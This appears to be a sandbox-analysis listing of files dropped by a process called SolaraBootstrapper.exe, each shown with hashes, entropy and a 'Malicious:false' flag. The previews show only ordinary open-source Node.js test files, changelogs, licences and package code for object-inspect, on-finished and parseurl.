                                                  SHA1:7F2632DAF24BF80417E9E21407CEC2A7770A9BB3
                                                  SHA-256:E2F0DC345D174BFB0F7CE790C5368702310015B0BE1EF274D72E3CE740DBE5D4
                                                  SHA-512:09439C8BB9BB981343A858B2FDB37A5FC2B2391E173CBADF9E188716A84727DA2837AF2BF169FEA9509D5ACB35CDAA1B73F2A31452B89DBC65F99A307A449D2C
                                                  Malicious:false
                                                  Preview:var inspect = require('../');.var test = require('tape');.var arrow = require('make-arrow-function')();.var functionsHaveConfigurableNames = require('functions-have-names').functionsHaveConfigurableNames();..test('function', function (t) {. t.plan(1);. var obj = [1, 2, function f(n) { return n; }, 4];. t.equal(inspect(obj), '[ 1, 2, [Function: f], 4 ]');.});..test('function name', function (t) {. t.plan(1);. var f = (function () {. return function () {};. }());. f.toString = function toStr() { return 'function xxx () {}'; };. var obj = [1, 2, f, 4];. t.equal(inspect(obj), '[ 1, 2, [Function (anonymous)] { toString: [Function: toStr] }, 4 ]');.});..test('anon function', function (t) {. var f = (function () {. return function () {};. }());. var obj = [1, 2, f, 4];. t.equal(inspect(obj), '[ 1, 2, [Function (anonymous)], 4 ]');.. t.end();.});..test('arrow function', { skip: !arrow }, function (t) {. t.equal(inspect(arrow), '[Functi
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):372
                                                  Entropy (8bit):4.696157876222702
                                                  Encrypted:false
                                                  SSDEEP:6:Qhx8ALSEMbeajFXIcASmnqSlgxKA4ZxelFyQN6EJKLARuZXHqHHS:s8S4t9ZmquPwyqHksRuZXKS
                                                  MD5:FE558C636B4234439B376B2E1B27F002
                                                  SHA1:4FD83D73BB033D306F0B9B3CCFB823FE8367A7AA
                                                  SHA-256:7C90C87B9B5062FA2AD7889E8981628D390CCC2C868E0A02BCC9FC2BE19492F8
                                                  SHA-512:37A1FD08D61C3875789B71CB47E6251442EA77079028A13958D2B4B37A6F58DBE127E1993D5854E7FBF05734929FEDB3A06BE27C9E7027CD99E0F4AB31A8059A
                                                  Malicious:false
                                                  Preview:'use strict';..var inspect = require('../');..var test = require('tape');.var globalThis = require('globalthis')();..test('global object', function (t) {. /* eslint-env browser */. var expected = typeof window === 'undefined' ? 'globalThis' : 'Window';. t.equal(. inspect([globalThis]),. '[ { [object ' + expected + '] } ]'. );.. t.end();.});.
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):514
                                                  Entropy (8bit):4.85155815285756
                                                  Encrypted:false
                                                  SSDEEP:6:QhxUALeON64qHY3wO2P/qYKlI3e2GJosqJGMuPFyzXpwpJ+s2GmKHqJUSipKD4KH:sRRwHa8q7lbHt0p46ipK0A
                                                  MD5:0694ED878C8943DBC3388240CC25D3EA
                                                  SHA1:BC38AB803D5082C70592725ABAF3142AF66EB52A
                                                  SHA-256:929E5D9EE18E4FD7E6E7DA3C6D9F988C4643CC8254F0C18950F28C102A10AD5D
                                                  SHA-512:F417CB3FA6C66AD1F9E4EE3149D290071FD2573D4FAAA1E2D30EB25732EE23F78194850EE5394E2C4931A1404A50D0E63FB367047CDB3DA4B70972531240A8AA
                                                  Malicious:false
                                                  Preview:'use strict';..var inspect = require('../');.var test = require('tape');.var mockProperty = require('mock-property');..test('when Object#hasOwnProperty is deleted', function (t) {. t.plan(1);. var arr = [1, , 3]; // eslint-disable-line no-sparse-arrays.. t.teardown(mockProperty(Array.prototype, 1, { value: 2 })); // this is needed to account for "in" vs "hasOwnProperty". t.teardown(mockProperty(Object.prototype, 'hasOwnProperty', { 'delete': true }));.. t.equal(inspect(arr), '[ 1, , 3 ]');.});.
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):255
                                                  Entropy (8bit):4.45127014258196
                                                  Encrypted:false
                                                  SSDEEP:6:qULoxwWJa5tMKS7HPP/oQNXEJeCoDsi2whw:zywWi9s/oWeoDs7+w
                                                  MD5:2C0CBCC4BB33C7CDCB577DA13B553A22
                                                  SHA1:363C0159CA852EBBEDC3052EED5A22B18705BDDC
                                                  SHA-256:6DEBF6783179E75E1559BD5DDAFB7352244D11204F3BE24D9C93FE96778F55F2
                                                  SHA-512:DF93430971CEFBC1F879A717247AA65D1E92DCBBBB98D4B46F355BA3A8DF0F7EB7E2C05B0F8373A4C946C737716AFA151157BDDC7226391EEC9C81C9E70CCC7D
                                                  Malicious:false
                                                  Preview:var test = require('tape');.var inspect = require('../');..var xs = ['a', 'b'];.xs[5] = 'f';.xs[7] = 'j';.xs[8] = 'k';..test('holes', function (t) {. t.plan(1);. t.equal(. inspect(xs),. "[ 'a', 'b', , , , 'f', , 'j', 'k' ]". );.});.
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):6633
                                                  Entropy (8bit):4.377727980344043
                                                  Encrypted:false
                                                  SSDEEP:48:FY+jyMwYWDoGOxBG9pnoHe8hTHiw7oWD0oXZ/PJEr/6rN/di2/i6xElq0qBZmEc7:FgCWJOxBGbpeHiwXi+TiMi9E7FO8I8cD
                                                  MD5:EBD803D85016BEC5528CB8E3E2637E9E
                                                  SHA1:F63D035326A6D661790E7DF0CD5EC09C84B6C06B
                                                  SHA-256:88AB6D6B8D0B059B0CE6B1632BDD5B8A7A218B61572F2FA6C9F01ABC9925A362
                                                  SHA-512:11A8F648A496D10402E67B8A126266F241DFE7B91E91E322BE8D94EA72FB75EC932DB037CD8FEE768D24981BFB02D178FA958742D5F70D5DDBE6F4A2E64B213E
                                                  Malicious:false
                                                  Preview:var test = require('tape');.var forEach = require('for-each');..var inspect = require('../');..test('bad indent options', function (t) {. forEach([. undefined,. true,. false,. -1,. 1.2,. Infinity,. -Infinity,. NaN. ], function (indent) {. t['throws'](. function () { inspect('', { indent: indent }); },. TypeError,. inspect(indent) + ' is invalid'. );. });.. t.end();.});..test('simple object with indent', function (t) {. t.plan(2);.. var obj = { a: 1, b: 2 };.. var expectedSpaces = [. '{',. ' a: 1,',. ' b: 2',. '}'. ].join('\n');. var expectedTabs = [. '{',. '.a: 1,',. '.b: 2',. '}'. ].join('\n');.. t.equal(inspect(obj, { indent: 2 }), expectedSpaces, 'two');. t.equal(inspect(obj, { indent: '\t' }), expectedTabs, 'tabs');.});..test('two deep object with indent', function (t) {. t.plan(2);..
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:Unicode text, UTF-8 text
                                                  Category:dropped
                                                  Size (bytes):4946
                                                  Entropy (8bit):4.8512527641865235
                                                  Encrypted:false
                                                  SSDEEP:96:TiX+L0xxC/IbTB/OqMl6ZVSXRadVbgSdaFgYinkswt9F:eDUfl6ZVS4dVLdavqvc9F
                                                  MD5:A5BA2487B711A790C4E5D937363668EA
                                                  SHA1:9FC5B4F123621597589B21112BBB0972E83B70A3
                                                  SHA-256:8C60F38286B654632CDFC4015A47657C339591E82A4489E181B689E2F2625D23
                                                  SHA-512:97964B04C56F5A066C60F76A1266430CDCA05CCE73AFF63E30377DA9B98E6B08E38D9DA8E63AAFE8A1D7C3D4CBDF73F8781A14723FAFEC210D96D22143703CB9
                                                  Malicious:false
                                                  Preview:var test = require('tape');.var hasSymbols = require('has-symbols/shams')();.var utilInspect = require('../util.inspect');.var repeat = require('string.prototype.repeat');..var inspect = require('..');..test('inspect', function (t) {. t.plan(5);.. var obj = [{ inspect: function xyzInspect() { return '!XYZ.'; } }, []];. var stringResult = '[ !XYZ., [] ]';. var falseResult = '[ { inspect: [Function: xyzInspect] }, [] ]';.. t.equal(inspect(obj), stringResult);. t.equal(inspect(obj, { customInspect: true }), stringResult);. t.equal(inspect(obj, { customInspect: 'symbol' }), falseResult);. t.equal(inspect(obj, { customInspect: false }), falseResult);. t['throws'](. function () { inspect(obj, { customInspect: 'not a boolean or "symbol"' }); },. TypeError,. '`customInspect` must be a boolean or the string "symbol"'. );.});..test('inspect custom symbol', { skip: !hasSymbols || !utilInspect || !utilInspect.custom }, function (t) {. t.plan(
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):268
                                                  Entropy (8bit):4.681947479643974
                                                  Encrypted:false
                                                  SSDEEP:6:qULoxHR/uvFS9JEWmaVP/oQ3s/J56xCtkkwhw:zyHC+/ma9ot5oCtkk+w
                                                  MD5:B654AE5EB4FC69C50815825F0409935B
                                                  SHA1:33FB054501A7AC439112B9AA209A52C74E21FDF9
                                                  SHA-256:A0CE0AB0DEE87383B9D2D957F76EB21658A9A660FD80CD666F0F94AA4B28478F
                                                  SHA-512:5F203DFC57D7415CF52A97EFA394AF995F5035BD78C5FAFA554BCEF785D31AA943F6179DFFE3A959CE6E7B8C89220231F4472F9F7374F84430AF3C0C0CDD887A
                                                  Malicious:false
                                                  Preview:var test = require('tape');.var inspect = require('../');..var obj = { x: 'a\r\nb', y: '\x05! \x1f \x12' };..test('interpolate low bytes', function (t) {. t.plan(1);. t.equal(. inspect(obj),. "{ x: 'a\\r\\nb', y: '\\x05! \\x1F \\x12' }". );.});.
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):2312
                                                  Entropy (8bit):4.777938348783971
                                                  Encrypted:false
                                                  SSDEEP:24:xYcJeHo52JVHorPmirTKnjO5D1Df/a5hroyGA2QIuOothVOoAgoCwo2hJOoNlJKl:ym5Kef/1yuCHEs6psJKs3
                                                  MD5:7A7236780C79F49BD6E5F03B8295CFB4
                                                  SHA1:D059D6691F8D227AB05E81CFB40119962154B51D
                                                  SHA-256:B688DDF9D78CCD7B295B8D73DDFE29F0DA5EC5ACF884E570842106CA649F93D8
                                                  SHA-512:BE115FC9FCF4BC9E4B67988ED77ED52D21F75043C2A7C4AE82E43DF74A5F9DE35A2CD64C1C7FA1C8DDE646B6477ACB914BA51BB7B61202323E950AEAD89BD9C9
                                                  Malicious:false
                                                  Preview:var test = require('tape');.var v = require('es-value-fixtures');.var forEach = require('for-each');..var inspect = require('../');..test('negative zero', function (t) {. t.equal(inspect(0), '0', 'inspect(0) === "0"');. t.equal(inspect(Object(0)), 'Object(0)', 'inspect(Object(0)) === "Object(0)"');.. t.equal(inspect(-0), '-0', 'inspect(-0) === "-0"');. t.equal(inspect(Object(-0)), 'Object(-0)', 'inspect(Object(-0)) === "Object(-0)"');.. t.end();.});..test('numericSeparator', function (t) {. forEach(v.nonBooleans, function (nonBoolean) {. t['throws'](. function () { inspect(true, { numericSeparator: nonBoolean }); },. TypeError,. inspect(nonBoolean) + ' is not a boolean'. );. });.. t.test('3 digit numbers', function (st) {. var failed = false;. for (var i = -999; i < 1000; i += 1) {. var actual = inspect(i);. var actualSepNo = inspect(i, { numericSeparator: false });. va
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):933
                                                  Entropy (8bit):4.612377624710445
                                                  Encrypted:false
                                                  SSDEEP:24:uIrlANJrhWAvlANJ+uvlANJZbvlANJXvlANJXvlANJ/FZvlANJk2vlANJyS:HBUGQ66s5QW
                                                  MD5:AEC686CCCD79C71E578E292273B77D5A
                                                  SHA1:1022E3F21738C55AD426C0664D80D946D2A52846
                                                  SHA-256:ABCBFF1298CD64BA2486E8EC269E8BBED400C320CA04E4B646D95ADE1D9C07F4
                                                  SHA-512:7B750F4D0B8F90A594FED2EE98E436C549C4727C81F1A29650E729DF54FF10E31214F17C9796EFEB1A4A0D19564E57EABE394A6BAAC28C1DB054D5F6F15032D1
                                                  Malicious:false
                                                  Preview:'use strict';..var inspect = require('../');.var test = require('tape');..test('quoteStyle option', function (t) {. t['throws'](function () { inspect(null, { quoteStyle: false }); }, 'false is not a valid value');. t['throws'](function () { inspect(null, { quoteStyle: true }); }, 'true is not a valid value');. t['throws'](function () { inspect(null, { quoteStyle: '' }); }, '"" is not a valid value');. t['throws'](function () { inspect(null, { quoteStyle: {} }); }, '{} is not a valid value');. t['throws'](function () { inspect(null, { quoteStyle: [] }); }, '[] is not a valid value');. t['throws'](function () { inspect(null, { quoteStyle: 42 }); }, '42 is not a valid value');. t['throws'](function () { inspect(null, { quoteStyle: NaN }); }, 'NaN is not a valid value');. t['throws'](function () { inspect(null, { quoteStyle: function () {} }); }, 'a function is not a valid value');.. t.end();.});.
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):1546
                                                  Entropy (8bit):4.822322690784088
                                                  Encrypted:false
                                                  SSDEEP:24:je2hNxOknzgyy4gNdmga0ad7w6Sad+EkOcOOrU1pOexxoBU1LjeOo4B:jRLOZjNc+aJKajkjnCOApSOb
                                                  MD5:EB83817B7462211617E9B6473D87ABED
                                                  SHA1:8990589B814ED0E62D5DDFA37A9D5FE2561EB689
                                                  SHA-256:C8EDFFBCCCB9AE87C3DBF9F8E0E3112DC4F062AC911AA54B0A40F8639988A114
                                                  SHA-512:7A3298CDD70C3E3A1995BD6E0EDC51820EFE0184F71D3F63443087A4B111CFF73942992FEA5BCC496D7D937978701B43495FD5BEF9A3A506905E5F47EAB6EC14
                                                  Malicious:false
                                                  Preview:'use strict';..var test = require('tape');.var hasToStringTag = require('has-tostringtag/shams')();..var inspect = require('../');..test('Symbol.toStringTag', { skip: !hasToStringTag }, function (t) {. t.plan(4);.. var obj = { a: 1 };. t.equal(inspect(obj), '{ a: 1 }', 'object, no Symbol.toStringTag');.. obj[Symbol.toStringTag] = 'foo';. t.equal(inspect(obj), '{ a: 1, [Symbol(Symbol.toStringTag)]: \'foo\' }', 'object with Symbol.toStringTag');.. t.test('null objects', { skip: 'toString' in { __proto__: null } }, function (st) {. st.plan(2);.. var dict = { __proto__: null, a: 1 };. st.equal(inspect(dict), '[Object: null prototype] { a: 1 }', 'null object with Symbol.toStringTag');.. dict[Symbol.toStringTag] = 'Dict';. st.equal(inspect(dict), '[Dict: null prototype] { a: 1, [Symbol(Symbol.toStringTag)]: \'Dict\' }', 'null object with Symbol.toStringTag');. });.. t.test('instances', function (st) {. st.plan(4);.. fun
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):302
                                                  Entropy (8bit):4.474360037688691
                                                  Encrypted:false
                                                  SSDEEP:6:qULoxHR+mLwKJ0WdvPVP/oQ3pkWgrw0WBdZhw:zyH4mr3o1W2w7w
                                                  MD5:EB05458C869D75C0405906C1DCF66442
                                                  SHA1:DA8ADC357DBD8E3C557224737C608494311EF49D
                                                  SHA-256:B1F88FEB036F85511AAACEB85CA3676C98B56D14130E09D9501056F917862281
                                                  SHA-512:24A31FD461D586670CB385D3F6C41A01D2AD07E7A932D31A7EA79005F4480C0EE1E92DD1201D8C818410433F03A29FFFFF52DE038A844D5A8775F0CF47597F2C
                                                  Malicious:false
                                                  Preview:var test = require('tape');.var inspect = require('../');..var obj = { a: 1, b: [3, 4, undefined, null], c: undefined, d: null };..test('undef and null', function (t) {. t.plan(1);. t.equal(. inspect(obj),. '{ a: 1, b: [ 3, 4, undefined, null ], c: undefined, d: null }'. );.});.
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):7034
                                                  Entropy (8bit):4.91843404364377
                                                  Encrypted:false
                                                  SSDEEP:192:UgSay9iJQiZHwmQpUh98q7hDfhZwKfSDHT:UX4QiO1pu988DwDz
                                                  MD5:085255FAD7CB4160A69DAF9BC1640ADF
                                                  SHA1:73179FF75FBD8F9F9A2A3A25D415262FD8C82EA6
                                                  SHA-256:38654BBCDE063DFC081F6010E4D795E961A09CC80DBF00AD39670FEC8EB7718F
                                                  SHA-512:B24C9F9540DFE0864C19D4305C306EB986EA48AF86E52A6C814F7B89D9484AA40904125B87F06290B173E007D6DA67A6C2C9B271BCD4DC3E7CF68F2F8CAA9E71
                                                  Malicious:false
                                                  Preview:'use strict';..var inspect = require('../');.var test = require('tape');.var mockProperty = require('mock-property');.var hasSymbols = require('has-symbols/shams')();.var hasToStringTag = require('has-tostringtag/shams')();..test('values', function (t) {. t.plan(1);. var obj = [{}, [], { 'a-b': 5 }];. t.equal(inspect(obj), '[ {}, [], { \'a-b\': 5 } ]');.});..test('arrays with properties', function (t) {. t.plan(1);. var arr = [3];. arr.foo = 'bar';. var obj = [1, 2, arr];. obj.baz = 'quux';. obj.index = -1;. t.equal(inspect(obj), '[ 1, 2, [ 3, foo: \'bar\' ], baz: \'quux\', index: -1 ]');.});..test('has', function (t) {. t.plan(1);. t.teardown(mockProperty(Object.prototype, 'hasOwnProperty', { 'delete': true }));.. t.equal(inspect({ a: 1, b: 2 }), '{ a: 1, b: 2 }');.});..test('indexOf seen', function (t) {. t.plan(1);. var xs = [1, 2, 3, {}];. xs.push(xs);.. var seen = [];. seen.indexOf = undefined;.. t.equal(. inspect(xs,
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):42
                                                  Entropy (8bit):4.3297176493718394
                                                  Encrypted:false
                                                  SSDEEP:3:3BBBbJ4RI5VAhn:xBBKeAh
                                                  MD5:7BE99E6D26FA9567C53527A9F2A0B799
                                                  SHA1:112022493FBDFF21234DDCB2C94D2CF43766C7FB
                                                  SHA-256:BB49299375C82D8D22983B76F6C25CD9AC923DC61CD25FFFE9B3F71DAD26DC40
                                                  SHA-512:DF05BF7B8A0550EA49D085FFDA70A803980079CBFB739445AB02643264451D125478BAF139B9A58F85D4074FEFBC0192F9E3170B8031D040F1310FACD04B03E8
                                                  Malicious:false
                                                  Preview:module.exports = require('util').inspect;.
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):1865
                                                  Entropy (8bit):4.705247315400775
                                                  Encrypted:false
                                                  SSDEEP:48:/jJg7Yz+DK6sQ6r7K4BQs87Yx4CTyj2BYGbJvOMGz:/jJ+Yz+D6r7FBQsqYxgQ7y
                                                  MD5:1B37A008548EB829D8D7E296AF2DAA36
                                                  SHA1:90B4A9C7134567AD4C80AB8B97472B1D7792434E
                                                  SHA-256:1954661AFCAEE2B2E961F1B56DC9694F3074608DEF2A4AE75F7B1203D18086CA
                                                  SHA-512:71BDBD2FD52238049D91275CF2B13E84969CA567C98C7D8CA705C1B503A78B43D6811C6727C75EF8302056AE85AFE851F2FD7E70F4E0334E44C8F6AD11A72C72
                                                  Malicious:false
                                                  Preview:2.4.1 / 2022-02-22.==================.. * Fix error on early async hooks implementations..2.4.0 / 2022-02-21.==================.. * Prevent loss of async hooks context..2.3.0 / 2015-05-26.==================.. * Add defined behavior for HTTP `CONNECT` requests. * Add defined behavior for HTTP `Upgrade` requests. * deps: ee-first@1.1.1..2.2.1 / 2015-04-22.==================.. * Fix `isFinished(req)` when data buffered..2.2.0 / 2014-12-22.==================.. * Add message object to callback arguments..2.1.1 / 2014-10-22.==================.. * Fix handling of pipelined requests..2.1.0 / 2014-08-16.==================.. * Check if `socket` is detached. * Return `undefined` for `isFinished` if state unknown..2.0.0 / 2014-08-16.==================.. * Add `isFinished` function. * Move to `jshttp` organization. * Remove support for plain socket argument. * Rename to `on-finished`. * Support both `req` and `res` as arguments. * deps: ee-first@1.0.5..1.2.2 / 2014-06-10.===========
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):1167
                                                  Entropy (8bit):5.176199836532222
                                                  Encrypted:false
                                                  SSDEEP:24:g1iJH/ZHHuyPP3GtIHw1Gg9MPH+sUW8Ok4odZo3U/qldFD:g1iJfxfPvGt7ICMPH+sfINi3OMFD
                                                  MD5:1B1F7F9CEC194121FDF616B971DF7A7B
                                                  SHA1:A3AA1554383F2419EC0DBCF207CA449EF7DC66CF
                                                  SHA-256:8089BCC08845EC143E5761F4A101A65B8C792A0DEDBFEEB90A15560C0B77F768
                                                  SHA-512:D984289EE5994589E88482F748FC00327A6D66A32C1773DC08B835B431B76EE8041A28BE5043E0C96C75E7DC77223A094CE7C1162227AFAD3BCEE0A60A68232F
                                                  Malicious:false
                                                  Preview:(The MIT License)..Copyright (c) 2013 Jonathan Ong <me@jongleberry.com>.Copyright (c) 2014 Douglas Christopher Wilson <doug@somethingdoug.com>..Permission is hereby granted, free of charge, to any person obtaining.a copy of this software and associated documentation files (the.'Software'), to deal in the Software without restriction, including.without limitation the rights to use, copy, modify, merge, publish,.distribute, sublicense, and/or sell copies of the Software, and to.permit persons to whom the Software is furnished to do so, subject to.the following conditions:..The above copyright notice and this permission notice shall be.included in all copies or substantial portions of the Software...THE SOFTWARE IS PROVIDED 'AS IS', WITHOUT WARRANTY OF ANY KIND,.EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF.MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT..IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY.CLAIM, DAMAGES OR OTHER
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:exported SGML document, ASCII text
                                                  Category:dropped
                                                  Size (bytes):5160
                                                  Entropy (8bit):4.88883335384546
                                                  Encrypted:false
                                                  SSDEEP:96:ipCM150Rv+ZTcypFpeESdu+SwlmDoJOknXCOcCUnJyI3UJyWhbX3Kn:UC81iKwlmonStEhm
                                                  MD5:562D5D7422331487F93E06407128AA82
                                                  SHA1:F5063BA874F2E3B282FE87921DF945EF0358D616
                                                  SHA-256:B52E3F3A4CE4FA24C28FE59CCC08B5F4866EB5DD57943718A4A914F35901AA89
                                                  SHA-512:13BC7EDEDD4F7B27CB28A47895E9FF239E55DCE77DC1CDDBE3BB603462D44F564FD1C4A536F626B3D69CD1BAB15920F65CF7AB0683FCFC7F33872B1242F2E208
                                                  Malicious:false
                                                  Preview:# on-finished..[![NPM Version][npm-version-image]][npm-url].[![NPM Downloads][npm-downloads-image]][npm-url].[![Node.js Version][node-image]][node-url].[![Build Status][ci-image]][ci-url].[![Coverage Status][coveralls-image]][coveralls-url]..Execute a callback when a HTTP request closes, finishes, or errors...## Install..This is a [Node.js](https://nodejs.org/en/) module available through the.[npm registry](https://www.npmjs.com/). Installation is done using the.[`npm install` command](https://docs.npmjs.com/getting-started/installing-npm-packages-locally):..```sh.$ npm install on-finished.```..## API..```js.var onFinished = require('on-finished').```..### onFinished(res, listener)..Attach a listener to listen for the response to finish. The listener will.be invoked only once when the response finished. If the response finished.to an error, the first argument will contain the error. If the response.has already finished, the listener will be invoked...Listening to the end of a response
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):4430
                                                  Entropy (8bit):4.819531405733524
                                                  Encrypted:false
                                                  SSDEEP:96:BZ90D5eD/n8EfkUlOXld3ZnzS75I51TNZ9FeVz2qNKXIhXDlp:b9uc8UkU4Xz3ZzY+1TNHF42aKXUXDlp
                                                  MD5:B1C3D24B92F25989B8AEFC7F6AAA91BA
                                                  SHA1:3F69307BD04CC4DFE71CD13616509F443B48F923
                                                  SHA-256:8E16BAE14EC63BAC9CDBB50572A7B53061FEE914712F5E803FF03C44E8845276
                                                  SHA-512:4225C714BEC718D7CC59CD2C91A07A77E41CCE3AB52502BF9B5B9CCD7D0CE88C040E0A765E5B2C3576AC8F101DC00FFF94F8C7AC7586111A545B228831A11ED0
                                                  Malicious:false
                                                  Preview:/*!. * on-finished. * Copyright(c) 2013 Jonathan Ong. * Copyright(c) 2014 Douglas Christopher Wilson. * MIT Licensed. */..'use strict'../**. * Module exports.. * @public. */..module.exports = onFinished.module.exports.isFinished = isFinished../**. * Module dependencies.. * @private. */..var asyncHooks = tryRequireAsyncHooks().var first = require('ee-first')../**. * Variables.. * @private. */../* istanbul ignore next */.var defer = typeof setImmediate === 'function'. ? setImmediate. : function (fn) { process.nextTick(fn.bind.apply(fn, arguments)) }../**. * Invoke callback when the response has finished, useful for. * cleaning up resources afterwards.. *. * @param {object} msg. * @param {function} listener. * @return {object}. * @public. */..function onFinished (msg, listener) {. if (isFinished(msg) !== false) {. defer(listener, null, msg). return msg. }.. // attach the listener to the message. attachListener(msg, wrap(listener)).. return msg.}../**. * Determine if message i
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:JSON data
                                                  Category:dropped
                                                  Size (bytes):1057
                                                  Entropy (8bit):4.804895526121064
                                                  Encrypted:false
                                                  SSDEEP:24:x3cR1wxVWbeN670YuNCHRIZBlWAuoZKLvP:Z6eVWbec4YuNCHRIzUtoorP
                                                  MD5:436846DD0F4348AC2EE93C9C5EB291E4
                                                  SHA1:777E9CD400B42DEE1199EACFB325876CAEAFF3CC
                                                  SHA-256:C812ECA4B0DEE2317CB446124CB27AE8E5B993C8FDD0144886B629EF6EF53FC1
                                                  SHA-512:D261E261BC9D2E5A39A50C6B072E6DA995764769ABDC4F9F3CF219CC2296C0E45EE194C3F4F431A248FD1D46D90745AD0B576D2FCB24E59D9208804B9C1532D7
                                                  Malicious:false
                                                  Preview:{. "name": "on-finished",. "description": "Execute a callback when a request closes, finishes, or errors",. "version": "2.4.1",. "contributors": [. "Douglas Christopher Wilson <doug@somethingdoug.com>",. "Jonathan Ong <me@jongleberry.com> (http://jongleberry.com)". ],. "license": "MIT",. "repository": "jshttp/on-finished",. "dependencies": {. "ee-first": "1.1.1". },. "devDependencies": {. "eslint": "7.32.0",. "eslint-config-standard": "14.1.1",. "eslint-plugin-import": "2.25.4",. "eslint-plugin-markdown": "2.2.1",. "eslint-plugin-node": "11.1.0",. "eslint-plugin-promise": "5.2.0",. "eslint-plugin-standard": "4.1.0",. "mocha": "9.2.1",. "nyc": "15.1.0". },. "engines": {. "node": ">= 0.8". },. "files": [. "HISTORY.md",. "LICENSE",. "index.js". ],. "scripts": {. "lint": "eslint .",. "test": "mocha --reporter spec --bail --check-leaks test/",. "test-ci": "nyc --reporter=lcovonly --reporter=text npm test",. "test-co
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):1043
                                                  Entropy (8bit):4.739303790993595
                                                  Encrypted:false
                                                  SSDEEP:24:MQ1Z4386QRnieR8AX2ORyUyDtw3zZ6SGj0:Z4386QRnd8ADRyrQd
                                                  MD5:0F7F38FA8D79E3BF70557EF4A655D412
                                                  SHA1:DEE736EDC00ED5282B24CD6DBB3AECE6B36CCB2D
                                                  SHA-256:AA6E5CD75DDDE03B54623AF11E6AEB6F92CCF6A1C69805B20890228182030189
                                                  SHA-512:A44AD1A193924E7201006422CB995254784AC2F5223733DD00C9A071902839822471271F8FABF91D7C729D0D51C441C73C31DBACCB1CD000CE9934FC535F671D
                                                  Malicious:false
                                                  Preview:1.3.3 / 2019-04-15.==================.. * Fix Node.js 0.8 return value inconsistencies..1.3.2 / 2017-09-09.==================.. * perf: reduce overhead for full URLs. * perf: unroll the "fast-path" `RegExp`..1.3.1 / 2016-01-17.==================.. * perf: enable strict mode..1.3.0 / 2014-08-09.==================.. * Add `parseurl.original` for parsing `req.originalUrl` with fallback. * Return `undefined` if `req.url` is `undefined`..1.2.0 / 2014-07-21.==================.. * Cache URLs based on original value. * Remove no-longer-needed URL mis-parse work-around. * Simplify the "fast-path" `RegExp`..1.1.3 / 2014-07-08.==================.. * Fix typo..1.1.2 / 2014-07-08.==================.. * Seriously fix Node.js 0.8 compatibility..1.1.1 / 2014-07-08.==================.. * Fix Node.js 0.8 compatibility..1.1.0 / 2014-07-08.==================.. * Incorporate URL href-only parse fast-path..1.0.1 / 2014-03-08.==================.. * Add missing `require`..1.0.0 / 2014-03-08.====
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):1173
                                                  Entropy (8bit):5.195373648205954
                                                  Encrypted:false
                                                  SSDEEP:24:zbYiJH/ZHHuyPP3GtIHw1Gg9MPH+sUW8Ok4odZo3U/qldFD:XYiJfxfPvGt7ICMPH+sfINi3OMFD
                                                  MD5:E7842ED4F188E53E53C3E8D9C4807E89
                                                  SHA1:96EE35A54FC07FF9945901C6E0AFDA0FBDC05BBF
                                                  SHA-256:11D017C3B9F1EE3F44CAF7203035F0461D5B57E0DB8CE1BC03A9AF34FA7D3F6B
                                                  SHA-512:D5682B61337113E6072A1AB3AAA288D04624CB4A3E9F46FDC0269A46617F471BE620565DE6A8063BC3F79B5F314648550545804EE6C5BFCA55C989EBBEB7365B
                                                  Malicious:false
